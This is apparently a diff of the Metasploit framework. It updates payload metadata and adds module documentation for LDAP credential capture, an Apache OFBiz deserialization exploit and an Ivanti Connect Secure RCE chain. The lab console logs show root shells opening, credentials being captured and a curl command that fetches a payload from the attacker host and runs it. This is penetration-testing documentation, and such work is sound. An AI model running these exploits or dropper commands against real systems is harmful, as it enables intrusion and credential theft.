"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/tftp/x64/shell/reverse_tcp_rc4",
|
||||
@@ -222965,7 +226626,7 @@
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from a tftp server.\n\nSpawn a piped command shell (Windows x64) (staged).\n\nConnect back to the attacker with UUID Support (Windows x64)",
|
||||
"description": "Fetch and execute an x64 payload from a TFTP server.\nSpawn a piped command shell (Windows x64) (staged).\n\nConnect back to the attacker with UUID Support (Windows x64)",
|
||||
"references": [
|
||||
|
||||
],
|
||||
@@ -222975,7 +226636,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/tftp/x64/shell/reverse_tcp_uuid",
|
||||
@@ -223006,7 +226667,7 @@
|
||||
"Brendan Watters",
|
||||
"sf <stephen_fewer@harmonysecurity.com>"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from a tftp server.\n\nListen for a connection and spawn a command shell (Windows x64)",
|
||||
"description": "Fetch and execute an x64 payload from a TFTP server.\nListen for a connection and spawn a command shell (Windows x64)",
|
||||
"references": [
|
||||
|
||||
],
|
||||
@@ -223016,7 +226677,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/tftp/x64/shell_bind_tcp",
|
||||
@@ -223045,7 +226706,7 @@
|
||||
"Brendan Watters",
|
||||
"sf <stephen_fewer@harmonysecurity.com>"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from a tftp server.\n\nConnect back to attacker and spawn a command shell (Windows x64)",
|
||||
"description": "Fetch and execute an x64 payload from a TFTP server.\nConnect back to attacker and spawn a command shell (Windows x64)",
|
||||
"references": [
|
||||
|
||||
],
|
||||
@@ -223055,7 +226716,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/tftp/x64/shell_reverse_tcp",
|
||||
@@ -223084,7 +226745,7 @@
|
||||
"Brendan Watters",
|
||||
"sf <stephen_fewer@harmonysecurity.com>"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from a tftp server.\n\nListen for an IPv6 connection (Windows x64)",
|
||||
"description": "Fetch and execute an x64 payload from a TFTP server.\nListen for an IPv6 connection (Windows x64)",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
@@ -223095,7 +226756,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/tftp/x64/vncinject/bind_ipv6_tcp",
|
||||
@@ -223127,7 +226788,7 @@
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from a tftp server.\n\nListen for an IPv6 connection with UUID Support (Windows x64)",
|
||||
"description": "Fetch and execute an x64 payload from a TFTP server.\nListen for an IPv6 connection with UUID Support (Windows x64)",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
@@ -223138,7 +226799,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/tftp/x64/vncinject/bind_ipv6_tcp_uuid",
|
||||
@@ -223170,7 +226831,7 @@
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"UserExistsError"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from a tftp server.\n\nListen for a pipe connection (Windows x64)",
|
||||
"description": "Fetch and execute an x64 payload from a TFTP server.\nListen for a pipe connection (Windows x64)",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
@@ -223181,7 +226842,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/tftp/x64/vncinject/bind_named_pipe",
|
||||
@@ -223212,7 +226873,7 @@
|
||||
"Brendan Watters",
|
||||
"sf <stephen_fewer@harmonysecurity.com>"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from a tftp server.\n\nListen for a connection (Windows x64)",
|
||||
"description": "Fetch and execute an x64 payload from a TFTP server.\nListen for a connection (Windows x64)",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
@@ -223223,7 +226884,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/tftp/x64/vncinject/bind_tcp",
|
||||
@@ -223259,7 +226920,7 @@
|
||||
"max3raza",
|
||||
"RageLtMan"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from a tftp server.\n\nConnect back to the attacker",
|
||||
"description": "Fetch and execute an x64 payload from a TFTP server.\nConnect back to the attacker",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
@@ -223270,7 +226931,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/tftp/x64/vncinject/bind_tcp_rc4",
|
||||
@@ -223302,7 +226963,7 @@
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from a tftp server.\n\nListen for a connection with UUID Support (Windows x64)",
|
||||
"description": "Fetch and execute an x64 payload from a TFTP server.\nListen for a connection with UUID Support (Windows x64)",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
@@ -223313,7 +226974,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/tftp/x64/vncinject/bind_tcp_uuid",
|
||||
@@ -223345,7 +227006,7 @@
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from a tftp server.\n\nTunnel communication over HTTP (Windows x64 wininet)",
|
||||
"description": "Fetch and execute an x64 payload from a TFTP server.\nTunnel communication over HTTP (Windows x64 wininet)",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
@@ -223356,7 +227017,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/tftp/x64/vncinject/reverse_http",
|
||||
@@ -223390,7 +227051,7 @@
|
||||
"agix",
|
||||
"rwincey"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from a tftp server.\n\nTunnel communication over HTTP (Windows x64 wininet)",
|
||||
"description": "Fetch and execute an x64 payload from a TFTP server.\nTunnel communication over HTTP (Windows x64 wininet)",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
@@ -223401,7 +227062,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/tftp/x64/vncinject/reverse_https",
|
||||
@@ -223432,7 +227093,7 @@
|
||||
"Brendan Watters",
|
||||
"sf <stephen_fewer@harmonysecurity.com>"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from a tftp server.\n\nConnect back to the attacker (Windows x64)",
|
||||
"description": "Fetch and execute an x64 payload from a TFTP server.\nConnect back to the attacker (Windows x64)",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
@@ -223443,7 +227104,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/tftp/x64/vncinject/reverse_tcp",
|
||||
@@ -223479,7 +227140,7 @@
|
||||
"max3raza",
|
||||
"RageLtMan"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from a tftp server.\n\nConnect back to the attacker",
|
||||
"description": "Fetch and execute an x64 payload from a TFTP server.\nConnect back to the attacker",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
@@ -223490,7 +227151,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/tftp/x64/vncinject/reverse_tcp_rc4",
|
||||
@@ -223522,7 +227183,7 @@
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from a tftp server.\n\nConnect back to the attacker with UUID Support (Windows x64)",
|
||||
"description": "Fetch and execute an x64 payload from a TFTP server.\nConnect back to the attacker with UUID Support (Windows x64)",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
@@ -223533,7 +227194,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/tftp/x64/vncinject/reverse_tcp_uuid",
|
||||
@@ -223565,7 +227226,7 @@
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from a tftp server.\n\nTunnel communication over HTTP (Windows x64 winhttp)",
|
||||
"description": "Fetch and execute an x64 payload from a TFTP server.\nTunnel communication over HTTP (Windows x64 winhttp)",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
@@ -223576,7 +227237,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/tftp/x64/vncinject/reverse_winhttp",
|
||||
@@ -223608,7 +227269,7 @@
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from a tftp server.\n\nTunnel communication over HTTPS (Windows x64 winhttp)",
|
||||
"description": "Fetch and execute an x64 payload from a TFTP server.\nTunnel communication over HTTPS (Windows x64 winhttp)",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
@@ -223619,7 +227280,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/tftp/x64/vncinject/reverse_winhttps",
|
||||
@@ -261452,7 +265113,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-02-08 13:47:34 +0000",
|
||||
"mod_time": "2024-01-31 18:07:07 +0000",
|
||||
"path": "/modules/post/windows/manage/mssql_local_auth_bypass.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "windows/manage/mssql_local_auth_bypass",
|
||||
|
||||
@@ -29,7 +29,7 @@ All of the above features can also be logically separated within workspaces. By
|
||||
|
||||
## Using msfdb
|
||||
|
||||
Using msfdb is simple. If you are starting the database for the first time navigate to the folder Metasploit is saved to, and run `./msfdb init`.
|
||||
Using msfdb is simple. If you are starting the database for the first time navigate to the folder Metasploit is saved to, and run `./msfdb init`
|
||||
```
|
||||
Creating database at /Users/your_current_account_name/.msf4/db
|
||||
Starting database at /Users/your_current_account_name/.msf4/db...success
|
||||
@@ -39,9 +39,14 @@ Starting database at /Users/your_current_account_name/.msf4/db...success
|
||||
Creating initial database schema
|
||||
```
|
||||
|
||||
This looks like a lot of information, but all it's saying is that it's creating the database Metasploit will use to store information.
|
||||
This looks like a lot of information, but all it's saying is that it's creating the database Metasploit will use to store information. If you start up msfconsole now it should automatically connect to the database, and if you run `db_status` you should see something like this:
|
||||
|
||||
msfdb then needs to establish the credentials that are used in the Web Service. The Web Service is how Metasploit connects to the database we have just created. The first prompt asks you what username you want to use to connect to the database.
|
||||
```
|
||||
msf6 > db_status
|
||||
[*] Connected to msf. Connection type: postgresql.
|
||||
```
|
||||
|
||||
You can also setup a Web Service, which Metasploit can use to connect to the database you have just created. Msfdb needs to establish the credentials that are used in the Web Service. If you run `msfdb --component webservice init` the first prompt asks you what username you want to use to connect to the database:
|
||||
|
||||
```
|
||||
[?] Initial MSF web service account username? [your_current_account_name]:
|
||||
|
||||
@@ -0,0 +1,52 @@
|
||||
|
||||
## Vulnerable Application
|
||||
|
||||
This module emulates an LDAP Server which accepts User Bind Request to capture the User Credentials.
|
||||
Upon receiving successful Bind Request, a `ldap_bind: Authentication method not supported (7)` error is sent to the User
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. Start msfconsole
|
||||
2. Do: `use auxiliary/server/capture/ldap`
|
||||
3. Do: `run`
|
||||
4. From a new shell or workstation, perform a ldap bind request involving User credentials.
|
||||
5. Check the database using `creds` for the user authentication information.
|
||||
|
||||
## Options
|
||||
|
||||
**Authentication**
|
||||
|
||||
The type of LDAP authentication to capture. The default type is `Simple`
|
||||
|
||||
## Scenarios
|
||||
|
||||
### Metasploit Server
|
||||
|
||||
```
|
||||
msf6 > use auxiliary/server/capture/ldap
|
||||
msf6 auxiliary(server/capture/ldap) > run
|
||||
|
||||
[*] Server started.
|
||||
[+] LDAP Login attempt => From:10.0.2.15:48198 Username:User Password:Pass
|
||||
```
|
||||
|
||||
### Client
|
||||
|
||||
```
|
||||
└─$ ldapsearch -LLL -H ldap://10.0.2.15 -D cn=User,dc=example,dc=com -W
|
||||
Enter LDAP Password:
|
||||
ldap_bind: Auth Method Not Supported (7)
|
||||
additional info: Auth Method Not Supported
|
||||
```
|
||||
|
||||
**Database**
|
||||
|
||||
```
|
||||
msf6 auxiliary(server/capture/ldap) > creds
|
||||
Credentials
|
||||
===========
|
||||
|
||||
host origin service public private realm private_type JtR Format
|
||||
---- ------ ------- ------ ------- ----- ------------ ----------
|
||||
10.0.2.15 10.0.2.15 389/tcp (ldap) User Pass example.com Password
|
||||
```
|
||||
@@ -4,14 +4,25 @@
|
||||
|
||||
This module exploits a Java deserialization vulnerability in Apache
|
||||
OFBiz's unauthenticated XML-RPC endpoint `/webtools/control/xmlrpc` for
|
||||
versions prior to 17.12.04.
|
||||
versions prior to 17.12.01 using the `ROME` gadget chain.
|
||||
|
||||
Versions up to 18.12.11 are exploitable utilizing an auth bypass CVE-2023-51467
|
||||
and use the `CommonsBeanutils1` gadget chain.
|
||||
|
||||
Verified working on 18.12.09, 17.12.01, and 15.12
|
||||
|
||||
### Setup
|
||||
|
||||
#### 15.12
|
||||
|
||||
You can use <https://hub.docker.com/r/opensourceknight/ofbiz>.
|
||||
|
||||
1. Initialize the database with demo data (`INIT_DB=2`) and bind to ports 8080 and 8443
|
||||
* `docker run -p 8080:8080 -p 8443:8443 --rm -e INIT_DB=2 opensourceknight/ofbiz:15.12`
|
||||
* `docker run -p 8080:8080 -p 8443:8443 --rm -e INIT_DB=2 opensourceknight/ofbiz:15.12`
|
||||
|
||||
#### 18.12.09
|
||||
|
||||
`docker run -p 8080:8080 -p 8443:8443 --rm -e INIT_DB=2 vulhub/ofbiz:18.12.09`
|
||||
|
||||
## Verification Steps
|
||||
|
||||
@@ -27,9 +38,11 @@ This executes a Unix command.
|
||||
|
||||
This uses a Linux dropper to execute code.
|
||||
|
||||
## Options
|
||||
|
||||
## Scenarios
|
||||
|
||||
### Apache OFBiz from [Docker](#setup).
|
||||
### Apache OFBiz from [Docker](#setup) 15.12.
|
||||
|
||||
```
|
||||
msf6 > use exploit/linux/http/apache_ofbiz_deserialization
|
||||
@@ -101,3 +114,50 @@ BuildTuple : x86_64-linux-musl
|
||||
Meterpreter : x64/linux
|
||||
meterpreter >
|
||||
```
|
||||
|
||||
### Apache OFBiz from [Docker](#setup) 18.12.09.
|
||||
|
||||
```
|
||||
[msf](Jobs:0 Agents:0) > use exploit/linux/http/apache_ofbiz_deserialization
|
||||
[*] Using configured payload linux/x64/meterpreter_reverse_https
|
||||
[msf](Jobs:0 Agents:0) exploit(linux/http/apache_ofbiz_deserialization) > set rhosts 127.0.0.1
|
||||
rhosts => 127.0.0.1
|
||||
[msf](Jobs:0 Agents:0) exploit(linux/http/apache_ofbiz_deserialization) > set ssl false
|
||||
[!] Changing the SSL option's value may require changing RPORT!
|
||||
ssl => false
|
||||
[msf](Jobs:0 Agents:0) exploit(linux/http/apache_ofbiz_deserialization) > set rport 8080
|
||||
rport => 8080
|
||||
[msf](Jobs:0 Agents:0) exploit(linux/http/apache_ofbiz_deserialization) > set srvport 8999
|
||||
srvport => 8999
|
||||
[msf](Jobs:0 Agents:0) exploit(linux/http/apache_ofbiz_deserialization) > set lport 9999
|
||||
lport => 9999
|
||||
[msf](Jobs:0 Agents:0) exploit(linux/http/apache_ofbiz_deserialization) > set lhost 172.17.0.1
|
||||
lhost => 172.17.0.1
|
||||
[msf](Jobs:0 Agents:0) exploit(linux/http/apache_ofbiz_deserialization) > exploit
|
||||
|
||||
[*] Started HTTPS reverse handler on https://172.17.0.1:9999
|
||||
[*] Running automatic check ("set AutoCheck false" to disable)
|
||||
[!] The service is running, but could not be validated. Apache OFBiz detected
|
||||
[*] Executing Linux Dropper for linux/x64/meterpreter_reverse_https
|
||||
[*] Using URL: http://172.17.0.1:8999/t8Ht92vyG
|
||||
[*] Client 172.17.0.2 (curl/7.74.0) requested /t8Ht92vyG
|
||||
[*] Sending payload to 172.17.0.2 (curl/7.74.0)
|
||||
[+] Successfully executed command: curl -so /tmp/ccOiSBWw http://172.17.0.1:8999/t8Ht92vyG;chmod +x /tmp/ccOiSBWw;/tmp/ccOiSBWw;rm -f /tmp/ccOiSBWw
|
||||
[*] https://172.17.0.1:9999 handling request from 172.17.0.2; (UUID: jfvsjqze) Redirecting stageless connection from /bor18uxq2-DRFNcWtLP2lwc954AkmwDFJGPdMCAemNwEhbK9MZE1sbFjd87crw4EoQ8IRya-nD4j7s9vkiPXENKkm6Hai6rTX1l6MxXV with UA 'Mozilla/5.0 (Macintosh; Intel Mac OS X 14.0; rv:109.0) Gecko/20100101 Firefox/118.0'
|
||||
[*] https://172.17.0.1:9999 handling request from 172.17.0.2; (UUID: jfvsjqze) Redirecting stageless connection from /bor18uxq2-DRFNcWtLP2lwBlG7PmcChFTs3mrZWe19ux0Ge4-K3sXMWLGzskiOvEJN9O34cT2vhArtS36BI-SM8HDCBKggdyux0 with UA 'Mozilla/5.0 (Macintosh; Intel Mac OS X 14.0; rv:109.0) Gecko/20100101 Firefox/118.0'
|
||||
[*] https://172.17.0.1:9999 handling request from 172.17.0.2; (UUID: jfvsjqze) Redirecting stageless connection from /bor18uxq2-DRFNcWtLP2lwS1jEDX4_Jx7YDDvUtpywgCk with UA 'Mozilla/5.0 (Macintosh; Intel Mac OS X 14.0; rv:109.0) Gecko/20100101 Firefox/118.0'
|
||||
[*] https://172.17.0.1:9999 handling request from 172.17.0.2; (UUID: jfvsjqze) Attaching orphaned/stageless session...
|
||||
[*] Command Stager progress - 100.00% done (112/112 bytes)
|
||||
[*] Meterpreter session 1 opened (172.17.0.1:9999 -> 172.17.0.2:47500) at 2024-01-16 20:04:06 -0500
|
||||
[*] Server stopped.
|
||||
|
||||
(Meterpreter 1)(/usr/src/apache-ofbiz) > getuid
|
||||
Server username: root
|
||||
(Meterpreter 1)(/usr/src/apache-ofbiz) > sysinfo
|
||||
Computer : 172.17.0.2
|
||||
OS : Debian 11.4 (Linux 6.5.0-kali3-amd64)
|
||||
Architecture : x64
|
||||
BuildTuple : x86_64-linux-musl
|
||||
Meterpreter : x64/linux
|
||||
(Meterpreter 1)(/usr/src/apache-ofbiz) >
|
||||
```
|
||||
@@ -0,0 +1,189 @@
|
||||
## Vulnerable Application
|
||||
This module chains a server side request forgery (SSRF) vulnerability (CVE-2024-21893) and a command injection
|
||||
vulnerability (CVE-2024-21887) to exploit vulnerable instances of either Ivanti Connect Secure or Ivanti
|
||||
Policy Secure, to achieve unauthenticated remote code execution. All currently supported versions 9.x and
|
||||
22.x are vulnerable, prior to the vendor patch released on Feb 1, 2024. It is unknown if unsupported versions
|
||||
8.x and below are also vulnerable.
|
||||
|
||||
## Testing
|
||||
To test we used Ivanti Connect Secure version 22.3R1 (build 1647), deployed as a virtual appliance for HyperV. The
|
||||
below steps are for HyperV, but it should be very similar to install on VMWare.
|
||||
|
||||
* Signup for a trial to download the file `ps-ics-hyper-v-isa-v-22.3r1.0-b1647-package.zip`
|
||||
* From this ZIP file, extract the file `ISA-V-HYPERV-ICS-22.3R1-1647.1-VT-hyperv.vhdx`
|
||||
* Create a new VM in HyperV and specify the VHDX file as the hard drives media.
|
||||
* Boot the VM and follow the console instructions to install the product.
|
||||
* After installation completes, you will have created an admin account and password. You can log into the admin
|
||||
web interface by visiting https://<TARGET_IP_ADDRESS>/admin in your web browser if you want.
|
||||
|
||||
## Verification Steps
|
||||
1. Start msfconsole
|
||||
2. `use exploit/linux/http/ivanti_connect_secure_rce_cve_2024_21893`
|
||||
3. `set RHOST <TARGET_IP_ADDRESS>`
|
||||
4. `set PAYLOAD cmd/linux/http/x64/meterpreter/reverse_tcp`
|
||||
5. `check`
|
||||
6. `exploit`
|
||||
|
||||
## Scenarios
|
||||
To support a broad set of available payloads, we support both the Linux and Unix platforms. This allows for native
|
||||
Linux payloads to be used, but also payloads like Python meterpreter or a Bash shell.
|
||||
|
||||
### Automatic (Linux Payload)
|
||||
|
||||
```
|
||||
msf6 exploit(linux/http/ivanti_connect_secure_rce_cve_2024_21893) > set RHOST 192.168.86.111
|
||||
RHOST => 192.168.86.111
|
||||
msf6 exploit(linux/http/ivanti_connect_secure_rce_cve_2024_21893) > set PAYLOAD cmd/linux/http/x64/meterpreter/reverse_tcp
|
||||
PAYLOAD => cmd/linux/http/x64/meterpreter/reverse_tcp
|
||||
msf6 exploit(linux/http/ivanti_connect_secure_rce_cve_2024_21893) > show options
|
||||
|
||||
Module options (exploit/linux/http/ivanti_connect_secure_rce_cve_2024_21893):
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
Proxies no A proxy chain of format type:host:port[
|
||||
,type:host:port][...]
|
||||
RHOSTS 192.168.86.111 yes The target host(s), see https://docs.me
|
||||
tasploit.com/docs/using-metasploit/basi
|
||||
cs/using-metasploit.html
|
||||
RPORT 443 yes The target port (TCP)
|
||||
SSL true no Negotiate SSL/TLS for outgoing connecti
|
||||
ons
|
||||
VHOST no HTTP server virtual host
|
||||
|
||||
|
||||
Payload options (cmd/linux/http/x64/meterpreter/reverse_tcp):
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
FETCH_COMMAND CURL yes Command to fetch payload (Acc
|
||||
epted: CURL, FTP, TFTP, TNFTP
|
||||
, WGET)
|
||||
FETCH_DELETE false yes Attempt to delete the binary
|
||||
after execution
|
||||
FETCH_FILENAME XMZdmHhNxYx no Name to use on remote system
|
||||
when storing payload; cannot
|
||||
contain spaces.
|
||||
FETCH_SRVHOST no Local IP to use for serving p
|
||||
ayload
|
||||
FETCH_SRVPORT 8080 yes Local port to use for serving
|
||||
payload
|
||||
FETCH_URIPATH no Local URI to use for serving
|
||||
payload
|
||||
FETCH_WRITABLE_DI /tmp yes Remote writable dir to store
|
||||
R payload; cannot contain space
|
||||
s.
|
||||
LHOST eth0 yes The listen address (an interf
|
||||
ace may be specified)
|
||||
LPORT 4444 yes The listen port
|
||||
|
||||
|
||||
Exploit target:
|
||||
|
||||
Id Name
|
||||
-- ----
|
||||
0 Automatic
|
||||
|
||||
|
||||
|
||||
View the full module info with the info, or info -d command.
|
||||
|
||||
msf6 exploit(linux/http/ivanti_connect_secure_rce_cve_2024_21893) > check
|
||||
[*] 192.168.86.111:443 - The service is running, but could not be validated.
|
||||
msf6 exploit(linux/http/ivanti_connect_secure_rce_cve_2024_21893) > exploit
|
||||
|
||||
[*] Started reverse TCP handler on 192.168.86.42:4444
|
||||
[*] Running automatic check ("set AutoCheck false" to disable)
|
||||
[!] The service is running, but could not be validated.
|
||||
[*] Sending stage (3045380 bytes) to 192.168.86.111
|
||||
[*] Meterpreter session 3 opened (192.168.86.42:4444 -> 192.168.86.111:45734) at 2024-02-09 09:21:59 +0000
|
||||
|
||||
meterpreter > getuid
|
||||
Server username: root
|
||||
meterpreter > sysinfo
|
||||
Computer : 192.168.86.111
|
||||
OS : (Linux 4.15.18.34-production)
|
||||
Architecture : x64
|
||||
BuildTuple : x86_64-linux-musl
|
||||
Meterpreter : x64/linux
|
||||
meterpreter > cat /home/ssl-vpn-VERSION
|
||||
export DSREL_MAJOR=22
|
||||
export DSREL_MINOR=3
|
||||
export DSREL_MAINT=1
|
||||
export DSREL_DATAVER=4802
|
||||
export DSREL_PRODUCT=ssl-vpn
|
||||
export DSREL_DEPS=ive
|
||||
export DSREL_BUILDNUM=1647
|
||||
export DSREL_COMMENT="R1"
|
||||
meterpreter > exit
|
||||
[*] Shutting down session: 3
|
||||
|
